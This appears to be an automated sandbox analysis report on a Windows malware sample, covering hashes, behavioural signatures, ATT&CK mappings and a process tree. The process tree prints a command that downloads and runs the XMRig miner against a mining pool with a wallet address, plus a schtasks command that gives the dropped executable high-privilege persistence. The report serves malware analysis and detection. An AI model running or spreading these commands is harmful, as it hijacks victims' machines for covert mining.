8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47

Resubmissions

10/10/2024, 04:54

241010-fjqxaaxgme 10

10/10/2024, 02:37

241010-c366tsvgpc 10

29/01/2024, 18:13

240129-wtq8sshdcl 10

Analysis

max time kernel
16s
max time network
29s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
10/10/2024, 02:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9b3430f42a0fb00d014c2fa208662865.exe
Size

4.8MB
MD5

9b3430f42a0fb00d014c2fa208662865
SHA1

09a16508bcc0a6da90c272daa2eff627ccd3205d
SHA256

8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47
SHA512

d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29
SSDEEP

98304:CdlaF/1RByjAQG/Mul2rq/aReDkizMeQUh:CdYvkji/Mul2rVe4iwVUh

Score

7^/10

Malware Config

Signatures

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/2708-1-0x00000000008E0000-0x0000000000DBA000-memory.dmp	net_reactor
behavioral1/files/0x000d000000017116-15.dat	net_reactor
behavioral1/memory/2740-19-0x0000000001080000-0x000000000155A000-memory.dmp	net_reactor

Executes dropped EXE 1 IoCs

pid	Process
2740	.exe

Loads dropped DLL 1 IoCs

pid	Process
3012	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2000	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2612	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2740	.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2708	9b3430f42a0fb00d014c2fa208662865.exe
Token: SeDebugPrivilege	2740	.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 3012	2708	9b3430f42a0fb00d014c2fa208662865.exe	30
PID 2708 wrote to memory of 3012	2708	9b3430f42a0fb00d014c2fa208662865.exe	30
PID 2708 wrote to memory of 3012	2708	9b3430f42a0fb00d014c2fa208662865.exe	30
PID 3012 wrote to memory of 2000	3012	cmd.exe	32
PID 3012 wrote to memory of 2000	3012	cmd.exe	32
PID 3012 wrote to memory of 2000	3012	cmd.exe	32
PID 3012 wrote to memory of 2740	3012	cmd.exe	33
PID 3012 wrote to memory of 2740	3012	cmd.exe	33
PID 3012 wrote to memory of 2740	3012	cmd.exe	33
PID 2740 wrote to memory of 2616	2740	.exe	34
PID 2740 wrote to memory of 2616	2740	.exe	34
PID 2740 wrote to memory of 2616	2740	.exe	34
PID 2616 wrote to memory of 2612	2616	cmd.exe	36
PID 2616 wrote to memory of 2612	2616	cmd.exe	36
PID 2616 wrote to memory of 2612	2616	cmd.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe
C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe wget "https://github.com/xmrig/xmrig/releases/download/v6.22.0/xmrig-6.22.0-jammy-x64.tar.gz" && tar xvf xmrig-6.22.0-jammy-x64.tar.gz && cd xmrig-6.22.0 && ./xmrig --donate-level 5 -o rx-us.unmineable.com:3333 -u TRX:TX1itTERFgpH3ahh3E6hsSazdnVo8hEtry.21-11 -p x -a rx/0
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F13.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3012
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2000
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2616
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp3F13.tmp.bat

Filesize
168B

MD5
b3c9c102914722c3ae1cc362a230bd87

SHA1
8b4089b5ff4fc8c286ea846999d9b76e6cb898c7

SHA256
42c9826647419280a2e0723104a962195aa032562d2d9b6d1d752844b393924c

SHA512
5898587975a22c9a469ff7bee2baf45e9434c8cba9f9344d0af43eec9af89cbd776e94d65d8dfc515c642641103c4793ee0e957020d8d4755305e3e8a630afcc

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
4.8MB

MD5
9b3430f42a0fb00d014c2fa208662865

SHA1
09a16508bcc0a6da90c272daa2eff627ccd3205d

SHA256
8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47

SHA512
d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29

Download Submit
memory/2708-0-0x000007FEF50B3000-0x000007FEF50B4000-memory.dmp

Filesize
4KB

Download
memory/2708-1-0x00000000008E0000-0x0000000000DBA000-memory.dmp

Filesize
4.9MB

Download
memory/2708-2-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2708-4-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2708-14-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2740-19-0x0000000001080000-0x000000000155A000-memory.dmp

Filesize
4.9MB

Download
memory/2740-21-0x000007FEF46C0000-0x000007FEF50AC000-memory.dmp

Filesize
9.9MB

Download
memory/2740-20-0x000007FEF46C0000-0x000007FEF50AC000-memory.dmp

Filesize
9.9MB

Download
memory/2740-22-0x000007FEF46C3000-0x000007FEF46C4000-memory.dmp

Filesize
4KB

Download
memory/2740-23-0x000007FEF46C0000-0x000007FEF50AC000-memory.dmp

Filesize
9.9MB

Download